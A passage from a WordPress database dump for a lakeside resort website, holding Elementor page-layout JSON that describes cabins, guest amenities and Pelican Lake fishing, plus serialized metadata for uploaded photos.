11\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"c5f5023\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/cabin11.jpg\",\"id\":282}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"a9b3aaa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div id=\\\"panel-786-1-1-1\\\" class=\\\"so-panel widget widget_sow-editor\\\" data-index=\\\"6\\\"><div class=\\\"so-widget-sow-editor so-widget-sow-editor-base\\\"><div class=\\\"siteorigin-widget-tinymce textwidget\\\"><p><strong>2 bedroom, 1 bath<\\/strong><\\/p><p><strong>\\u00a02 queen\\u00a0beds, 1\\u00a0double bed, 1 futon<\\/strong><\\/p><p><strong>Sleeps 8<\\/strong><\\/p><\\/div><\\/div><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"dcd2c6f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"e1b9636\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"68cf5dc\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"6008bdd\"}]},\"elements\":[{\"id\":\"6a1d473\",\"elType\":\"widget\",\"settings\":{\"title\":\"Cabin 12\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"c8e6a42\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2016\\/03\\/Carly-008.jpg\",\"id\":119}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"8fe9f77\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div id=\\\"panel-786-1-2-1\\\" class=\\\"so-panel widget widget_sow-editor\\\" data-index=\\\"10\\\"><div class=\\\"so-widget-sow-editor so-widget-sow-editor-base\\\"><div class=\\\"siteorigin-widget-tinymce textwidget\\\"><p><strong>Remodeled in 2016\\u00a0\\u00a0\\u00a0\\u00a0\\u00a0\\u00a0 2 bedroom 1 bath<\\/strong><\\/p><p><strong>\\u00a01 queen\\u00a0bed, 2 twin beds, 1 hide-a-bed,<\\/strong><\\/p><p><strong>Sleeps 6<\\/strong><\\/p><\\/div><\\/div><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f280b90\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"394f183\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"418f6db\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"ee7fbf2\"}]},\"elements\":[{\"id\":\"6bffb12\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"a389722\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"dc479f1\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"9bad41c\"}]},\"elements\":[{\"id\":\"66464a3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2019\\/04\\/Screen-Shot-2019-04-09-at-8.38.01-PM.png\",\"id\":781}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"aaa14b4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Done in knotty pine the cabin has air conditioning, TV and full kitchen.<\\/strong><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"3188235\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"3ae6faf\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"9c43867\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"8610c84\"}]},\"elements\":[{\"id\":\"7fbb51d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2019\\/04\\/Screen-Shot-2019-04-09-at-8.38.10-PM.png\",\"id\":782}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"d87bedc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Done in knotty pine the cabin has air conditioning, TV and full kitchen.<\\/strong><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"41f8343\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"478e9cb\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"8309568\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"a685e8c\"}]},\"elements\":[{\"id\":\"6a8b220\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2019\\/04\\/Screen-Shot-2019-04-09-at-8.38.17-PM.png\",\"id\":783}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"7203260\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p class=\\\"wp-caption-text\\\"><br \\/><strong>Done in knotty pine has air conditioning, full kitchen and bathtub<\\/strong><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8075410\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"2c48cf1\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"dcac1af\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"d389044\"}]},\"elements\":[{\"id\":\"e118b35\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"97d9b2a\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"8c7465d\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"11e2398\"}]},\"elements\":[{\"id\":\"5e6d46e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/Cabin1011interior02.jpg\",\"id\":280}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"47acfec\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"c86872a\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"a8e8c8e\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"17be54e\"}]},\"elements\":[{\"id\":\"0cd24ef\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/Cabin12interior.jpg\",\"id\":284}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4384dfc\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"9fd9d04\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"2873594\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"88e6c47\"}]},\"elements\":[{\"id\":\"a7d623e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/DSCN3948.jpg\",\"id\":388}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false}]'),(2723,871,'_wp_page_template','default'),(2724,871,'_elementor_edit_mode','builder'),(2725,871,'_elementor_template_type','post'),(2726,871,'_elementor_version','2.5.12'),(2727,871,'_elementor_data','[{\"id\":\"fc76464\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"5536551\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"56364c2\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"f341f9e\"}]},\"elements\":[{\"id\":\"5e4caa1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"0e293a0\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"e9d5e63\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"82ea2cc\"}]},\"elements\":[{\"id\":\"7e61b47\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2019\\/04\\/Screen-Shot-2019-04-09-at-8.03.24-PM.png\",\"id\":762}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"2d498c3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"7b344a2\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"049de3f\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"e9a8e52\"}]},\"elements\":[{\"id\":\"69d7ea9\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2019\\/04\\/Screen-Shot-2019-04-09-at-8.03.35-PM.png\",\"id\":763}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"f216db0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"2f3dfb8\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"ceb6001\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"13dae5e\"}]},\"elements\":[{\"id\":\"fb96a86\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2019\\/04\\/Screen-Shot-2019-04-09-at-8.01.55-PM.png\",\"id\":761}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2759c31\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"d872028\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"33c9c25\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"7c31972\"}]},\"elements\":[{\"id\":\"8b3f141\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"d74147d\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"94515cc\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"e85e195\"}]},\"elements\":[{\"id\":\"5025a8f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2019\\/04\\/Screen-Shot-2019-04-09-at-8.02.06-PM.png\",\"id\":764}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"b140f97\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"a7fed3b\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"193cbaa\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"4befc1e\"}]},\"elements\":[{\"id\":\"f317653\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2019\\/04\\/Screen-Shot-2019-04-09-at-8.02.16-PM.png\",\"id\":765}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"1ce41e4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"c556852\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"5afa19a\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"c4420cb\"}]},\"elements\":[{\"id\":\"adc26b8\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2019\\/04\\/Screen-Shot-2019-04-09-at-8.02.27-PM.png\",\"id\":767}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"27fb6f7\",\"elType\":\"section\",\"settings\":{\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"68e5b19\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"fdb7463\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"5413439\"}]},\"elements\":[{\"id\":\"d959af0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"bfaafa8\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"2e22536\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"8fe5ec3\"}]},\"elements\":[{\"id\":\"fcf0d1d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>To make your stay more fun, we have paddle boards, a paddle boat, kayaks, canoes available for use by our guests, NO charge !!<\\/p><p>Fishing boats and pontoon to rent by the day or week.<\\/p><p>The fish cleaning house is a great place to gather and hear about where the fish are biting.<\\/p><p>We have a sandy beach with a playground, horeshoes, dock fishing, dockside gas and a private boat launch.<\\/p><p>The Resort is located right next to the Central Lakes Bike and Snowmobile Trail\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(2736,872,'_wp_attached_file','2019/06/62208139_2851471431591627_415800096072925184_n.jpg'),(2737,872,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:640;s:6:\"height\";i:480;s:4:\"file\";s:58:\"2019/06/62208139_2851471431591627_415800096072925184_n.jpg\";s:5:\"sizes\";a:8:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:58:\"62208139_2851471431591627_415800096072925184_n-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:58:\"62208139_2851471431591627_415800096072925184_n-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:58:\"62208139_2851471431591627_415800096072925184_n-640x380.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"vantage-thumbnail-no-sidebar\";a:4:{s:4:\"file\";s:58:\"62208139_2851471431591627_415800096072925184_n-640x380.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:13:\"vantage-slide\";a:4:{s:4:\"file\";s:58:\"62208139_2851471431591627_415800096072925184_n-640x480.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:480;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"vantage-carousel\";a:4:{s:4:\"file\";s:58:\"62208139_2851471431591627_415800096072925184_n-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"vantage-grid-loop\";a:4:{s:4:\"file\";s:58:\"62208139_2851471431591627_415800096072925184_n-436x272.jpg\";s:5:\"width\";i:436;s:6:\"height\";i:272;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"sow-carousel-default\";a:4:{s:4:\"file\";s:58:\"62208139_2851471431591627_415800096072925184_n-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2738,873,'_wp_attached_file','2019/06/IMG_2905.jpg'),(2739,873,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:640;s:6:\"height\";i:463;s:4:\"file\";s:20:\"2019/06/IMG_2905.jpg\";s:5:\"sizes\";a:7:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"IMG_2905-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"IMG_2905-300x217.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:217;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:20:\"IMG_2905-640x380.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"vantage-thumbnail-no-sidebar\";a:4:{s:4:\"file\";s:20:\"IMG_2905-640x380.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"vantage-carousel\";a:4:{s:4:\"file\";s:20:\"IMG_2905-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"vantage-grid-loop\";a:4:{s:4:\"file\";s:20:\"IMG_2905-436x272.jpg\";s:5:\"width\";i:436;s:6:\"height\";i:272;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"sow-carousel-default\";a:4:{s:4:\"file\";s:20:\"IMG_2905-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"1.8\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:8:\"iPhone 8\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1558371010\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:4:\"3.99\";s:3:\"iso\";s:2:\"20\";s:13:\"shutter_speed\";s:17:\"0.000813008130081\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2740,874,'_wp_attached_file','2019/06/IMG_2971.jpg'),(2741,874,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:592;s:6:\"height\";i:640;s:4:\"file\";s:20:\"2019/06/IMG_2971.jpg\";s:5:\"sizes\";a:8:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"IMG_2971-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"IMG_2971-278x300.jpg\";s:5:\"width\";i:278;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:20:\"IMG_2971-592x380.jpg\";s:5:\"width\";i:592;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"vantage-thumbnail-no-sidebar\";a:4:{s:4:\"file\";s:20:\"IMG_2971-592x380.jpg\";s:5:\"width\";i:592;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:13:\"vantage-slide\";a:4:{s:4:\"file\";s:20:\"IMG_2971-592x480.jpg\";s:5:\"width\";i:592;s:6:\"height\";i:480;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"vantage-carousel\";a:4:{s:4:\"file\";s:20:\"IMG_2971-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"vantage-grid-loop\";a:4:{s:4:\"file\";s:20:\"IMG_2971-436x272.jpg\";s:5:\"width\";i:436;s:6:\"height\";i:272;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"sow-carousel-default\";a:4:{s:4:\"file\";s:20:\"IMG_2971-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"1.8\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:8:\"iPhone 8\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1559823113\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:4:\"3.99\";s:3:\"iso\";s:2:\"20\";s:13:\"shutter_speed\";s:17:\"0.000583090379009\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2742,875,'_wp_attached_file','2019/06/IMG_2933.jpg'),(2743,875,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:379;s:6:\"height\";i:640;s:4:\"file\";s:20:\"2019/06/IMG_2933.jpg\";s:5:\"sizes\";a:8:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"IMG_2933-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"IMG_2933-178x300.jpg\";s:5:\"width\";i:178;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:20:\"IMG_2933-379x380.jpg\";s:5:\"width\";i:379;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"vantage-thumbnail-no-sidebar\";a:4:{s:4:\"file\";s:20:\"IMG_2933-379x380.jpg\";s:5:\"width\";i:379;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:13:\"vantage-slide\";a:4:{s:4:\"file\";s:20:\"IMG_2933-379x480.jpg\";s:5:\"width\";i:379;s:6:\"height\";i:480;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"vantage-carousel\";a:4:{s:4:\"file\";s:20:\"IMG_2933-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"vantage-grid-loop\";a:4:{s:4:\"file\";s:20:\"IMG_2933-379x272.jpg\";s:5:\"width\";i:379;s:6:\"height\";i:272;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"sow-carousel-default\";a:4:{s:4:\"file\";s:20:\"IMG_2933-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"1.8\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:8:\"iPhone 8\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1558864428\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:4:\"3.99\";s:3:\"iso\";s:2:\"40\";s:13:\"shutter_speed\";s:15:\"0.0333333333333\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2745,876,'_wp_page_template','default'),(2746,876,'_elementor_template_type','post'),(2747,876,'_elementor_version','2.5.13'),(2748,876,'_elementor_edit_mode','builder'),(2749,876,'_elementor_data','[{\"id\":\"817ef92\",\"elType\":\"section\",\"settings\":{\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"c401d8f\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"2ff6c4b\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"49298b4\"}]},\"elements\":[{\"id\":\"c96dc87\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"1a80f0a\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"0dfcb72\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"b411014\"}]},\"elements\":[{\"id\":\"49aeb2c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>CATCH SOME MEMORIES<\\/strong><\\/p><p>Pelican Lake is a 4,000 acre lake with miles of interesting bays and coves to fish and explore. Pelican Lake is an excellent fishing lake for Northern, Walleye, Bass, and panfish.<\\/p><p><strong>JUST TAKE A LOOK<\\/strong><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"668445d\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\",\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"e5f24f9\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"5ab0e47\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"430173f\"}]},\"elements\":[{\"id\":\"e575265\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"6ee7655\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"61be359\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"86050f1\"}]},\"elements\":[{\"id\":\"de42909\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/20160522_070826.jpg\",\"id\":371},\"image_size\":\"medium_large\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"bf79270\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"9ae99af\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"83e04d3\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"ec9a0fe\"}]},\"elements\":[{\"id\":\"76a7de2\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/walleyelimit02-016.jpg\",\"id\":368}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"df5f462\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"5aa2626\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"48945bf\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"3f4ba65\"}]},\"elements\":[{\"id\":\"e432149\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/DSC03568.jpg\",\"id\":346}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"1cc6404\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"1ad7d8d\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"ad470d1\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"86f8da6\"}]},\"elements\":[{\"id\":\"06051df\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashb